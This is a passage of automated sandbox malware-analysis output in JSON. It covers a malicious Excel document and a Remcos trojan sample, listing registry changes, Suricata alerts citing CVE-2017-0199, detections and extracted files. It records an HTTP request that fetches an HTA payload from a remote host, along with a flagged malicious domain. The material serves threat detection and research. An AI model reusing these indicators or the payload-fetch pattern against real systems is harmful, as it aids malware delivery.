(compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Connection: Keep-AliveHost: <IPv4>\"\n Contains base64 string in header \"Encoding\" in header \"GET /430/nhu/sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Connection: Keep-AliveHost: <IPv4>\"\n Contains base64 string in header \"gzip\" in header \"GET /430/nhu/sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Connection: Keep-AliveHost: <IPv4>\"\n Contains base64 string in header \"MSIE\" in header \"GET /430/nhu/sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Connection: Keep-AliveHost: <IPv4>\"\n Contains base64 string in header \"NET4\" in header \"GET /430/nhu/sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Connection: Keep-AliveHost: <IPv4>\"\n Contains base64 string in header \"InfoPath\" in header \"GET /430/nhu/sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Connection: Keep-AliveHost: <IPv4>\"\n Contains base64 string in header \"Keep\" in header \"GET /430/nhu/sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Connection: Keep-AliveHost: <IPv4>\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.639972441557342", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{4B4C841F-03FF-4CF0-BCB0-CC5C7DA60873}\"; Key: \"WPADDECISIONREASON\"; Value: \"01000000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{4B4C841F-03FF-4CF0-BCB0-CC5C7DA60873}\"; Key: \"WPADDECISIONTIME\"; Value: \"2FBFA41C917BDB01\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{4B4C841F-03FF-4CF0-BCB0-CC5C7DA60873}\"; Key: \"WPADDECISION\"; Value: \"00000000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{4B4C841F-03FF-4CF0-BCB0-CC5C7DA60873}\"; Key: \"WPADNETWORKNAME\"; Value: \"Network 8\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\00-50-56-91-4F-96\"; Key: \"WPADDECISIONREASON\"; Value: \"01000000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\00-50-56-91-4F-96\"; Key: \"WPADDECISIONTIME\"; Value: \"2FBFA41C917BDB01\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\00-50-56-91-4F-96\"; Key: \"WPADDECISION\"; Value: \"00000000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{4B4C841F-03FF-4CF0-BCB0-CC5C7DA60873}\"; Key: \"WPADDECISIONTIME\"; Value: \"0E9B9D1C917BDB01\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\00-50-56-91-4F-96\"; Key: \"WPADDECISIONTIME\"; Value: \"0E9B9D1C917BDB01\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\EXCEL\\RESILIENCY\\STARTUPITEMS\"; Key: \"PT,\"; Value: \"pt,\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\COMMON\\LANGUAGERESOURCES\\ENABLEDLANGUAGES\"; Key: \"1033\"; Value: \"Off\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\COMMON\\LANGUAGERESOURCES\\ENABLEDLANGUAGES\"; Key: \"1033\"; Value: \"4F006E000000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\EXCEL\"; Key: \"MTTT\"; Value: \"DC160000E8D57810917BDB0100000000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"AUTODETECT\"; Value: \"01000000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\EXCEL\\RESILIENCY\\DOCUMENTRECOVERY\\36156515\"; Key: \"36156515\"; Value: \"04000000DC1600004700000043003A005C0066003400660038003100330030003200620031003000390036003000650062006100650061003000370036003600360063003300610061003200640032003100340037006500300039003300620061003000300063003500350039006100380031006400310032003500660039003500630032003200330030003800330035002E0078006C007300000000000300000043003A005C0001000000000000009042CB18917BDB01156515361565153600000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\EXCEL\\RESILIENCY\\DOCUMENTRECOVERY\\36156515\"; Key: \"36156515\"; Value: \"04000000DC1600004700000043003A005C0066003400660038003100330030003200620031003000390036003000650062006100650061003000370036003600360063003300610061003200640032003100340037006500300039003300620061003000300063003500350039006100380031006400310032003500660039003500630032003200330030003800330035002E0078006C007300000000000300000043003A005C0001000000000000009042CB18917BDB01156515361565153600000000AC020000001800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\COMMON\\REVIEWCYCLE\"; Key: \"REVIEWTOKEN\"; Value: \"{3982D39F-5BB4-4F79-831F-3EC2432DA25F}\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYENABLE\"; Value: \"00000000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\CONNECTIONS\"; Key: \"SAVEDLEGACYSETTINGS\"; Value: \"460000000E0200000900000000000000000000000000000004000000000000003071E4E2286CD3010000000000000000000000000100000002000000C0A8F1FC000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\5.0\\CACHE\\CONTENT\"; Key: \"CACHEPREFIX\"; Value: \"0000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\5.0\\CACHE\\COOKIES\"; Key: \"CACHEPREFIX\"; Value: \"Cookie:\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\5.0\\CACHE\\HISTORY\"; Key: \"CACHEPREFIX\"; Value: \"Visited:\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INSTALLER\\USERDATA\\S-1-5-18\\PRODUCTS\\00004109110000000000000000F01FEC\\USAGE\"; Key: \"EXCELFILES\"; Value: \"08004A5A\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INSTALLER\\USERDATA\\S-1-5-18\\PRODUCTS\\00004109110000000000000000F01FEC\\USAGE\"; Key: \"PRODUCTFILES\"; Value: \"01004A5A\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\EXCEL\\RESILIENCY\\DOCUMENTRECOVERY\\36159365\"; Key: \"36159365\"; Value: \"04000000DC1600004700000043003A005C0066003400660038003100330030003200620031003000390036003000650062006100650061003000370036003600360063003300610061003200640032003100340037006500300039003300620061003000300063003500350039006100380031006400310032003500660039003500630032003200330030003800330035002E0078006C007300000000000300000043003A005C000100000001000000009EBBFD907BDB01659315366593153600000000AC0200006E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\EXCEL\\PLACE MRU\"; Key: \"MAX DISPLAY\"; Value: \"19000000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\EXCEL\\PLACE MRU\"; Key: \"ITEM 1\"; Value: \"[F00000000][T01DB7B911FFD9B30][O00000000]*C:\\\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\EXCEL\\FILE MRU\"; Key: \"MAX DISPLAY\"; Value: \"19000000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\EXCEL\\FILE MRU\"; Key: \"ITEM 1\"; Value: \"[F00000000][T01DB7B911FFD9B30][O00000000]*C:\\f4f81302b10960ebaea07666c3aa2d2147e093ba00c559a81d125f95c2230835.xls\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\COMMON\\LICENSING\"; Key: \"538F6C892AD540068154C6670774E980\"; Value: \"09000000270000007B39303134303030302D303031312D303030302D303030302D3030303030303046463143457D00580000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F0050006C00750073002D004B004D0053005F0043006C00690065006E0074002000650064006900740069006F006E000000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INSTALLER\\USERDATA\\S-1-5-18\\PRODUCTS\\00004109110000000000000000F01FEC\\USAGE\"; Key: \"PRODUCTFILES\"; Value: \"02004A5A\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INSTALLER\\USERDATA\\S-1-5-18\\PRODUCTS\\00004109110000000000000000F01FEC\\USAGE\"; Key: \"PRODUCTFILES\"; Value: \"03004A5A\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\EXCEL\"; Key: \"MTTF\"; Value: \"B9000000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\EXCEL\"; Key: \"MTTA\"; Value: \"B9000000\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\LOCAL SETTINGS\\MUICACHE\\137\\52C64B7E\"; Key: \"LANGUAGELIST\"; Value: \"en-US\")\n \"EXCEL.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\OFFICE\\14.0\\EXCEL\\SECURITY\\TRUSTED DOCUMENTS\"; Key: \"LASTPURGETIME\"; Value: \"7D4BBA01\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\PARAMETERS\"; Key: \"RPCCACHETIMEOUT\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\PARAMETERS\"; Key: \"TRANSPORTS\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP6\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MINSOCKADDRLENGTH\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAXSOCKADDRLENGTH\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"USEDELAYEDACCEPTANCE\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"HELPERDLLNAME\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPV6DOMAIN\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"EXCEL.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\LINKAGE\"; Key: \"BIND\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 80 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-22", "type": 7, "relevance": 10, "name": "Uses a browser-related user-agent without launching browser", "description": "Found user-agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "External Systems", "identifier": "suricata-1", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET INFO Possible HTA Application Download\" (SID: 2022520, Rev: 6, Severity: 2) categorized as \"Potentially Bad Traffic\"", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "network-16", "type": 7, "relevance": 10, "name": "GETs files from a webserver", "description": "\"GET /430/nhu/sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\nConnection: Keep-Alive\nHost: <IPv4>\" Response ==> HTTP/1.1 404 Not Found\nDate: Mon\n 10 Feb 2025 08:55:14 GMT\nServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25\nContent-Length: 298\nKeep-Alive: timeout=5\n max=100\nConnection: Keep-Alive\nContent-Type: text/html; charset=iso-8859-1 with response body ==>3C21444F43545950452048544D4C205055424C494320222D2F2F494554462F2F4454442048544D4C20322E302F2F454E223E0A3C68746D6C3E3C686561643E0A.......", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"loooooooooooooooooooog.com\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "suricata-2", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl\" (SID: 2024449, Rev: 7, Severity: 1) categorized as \"Attempted User Privilege Gain\"", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: msoffice/malicious_confidence_100% (W)", "origin": "External System"}]}
3aa746d45a8db14fb49d2fddd2141a8c41919fd262ef07140f2bb73e77e53147
https://hybrid-analysis.com/sample/3aa746d45a8db14fb49d2fddd2141a8c41919fd262ef07140f2bb73e77e53147
Hybrid Analysis - Remcos
{"size": 1247232, "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "submit_name": "PCGB2GtVYuBR0mw.pif", "sha256": "3aa746d45a8db14fb49d2fddd2141a8c41919fd262ef07140f2bb73e77e53147", "av_detect": 83, "vx_family": "Trojan.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 7, "total_signatures": 183, "extracted_files": [{"name": "SUbPwEbpBhA.exe", "file_path": "%APPDATA%\\SUbPwEbpBhA.exe", "file_size": 1247232, "sha256": "3aa746d45a8db14fb49d2fddd2141a8c41919fd262ef07140f2bb73e77e53147", "type_tags": ["peexe", "assembly", "executable"], "description": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "PCGB2GtVYuBR0mw.pif.exe (PID: 2912)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.MSIL", "av_matched": 9, "av_total": 22, "file_available_to_download": true}, {"name": "StartupProfileData-NonInteractive", "file_path": "%LOCALAPPDATA%\\Microsoft\\Windows\\PowerShell\\StartupProfileData-NonInteractive", "file_size": 64, "sha256": "a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf", "type_tags": ["data"], "description": "data", "runtime_process": "powershell.exe (PID: 4784)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "57C8EDB95DF3F0AD4EE2DC2B8CFD4157", "file_path": "%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157", "file_size": 4795, "sha256": "bf5e0eaa3ebd5e5e842756ad53e86960701da5b11c978687f643c317430bbe63", "type_tags": ["data"], "description": "Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A \"disallowedcert.stl\", number 1, 1 datablock, 0x1 compression", "runtime_process": "powershell.exe (PID: 4784)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "57C8EDB95DF3F0AD4EE2DC2B8CFD4157", "file_path": "%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157", 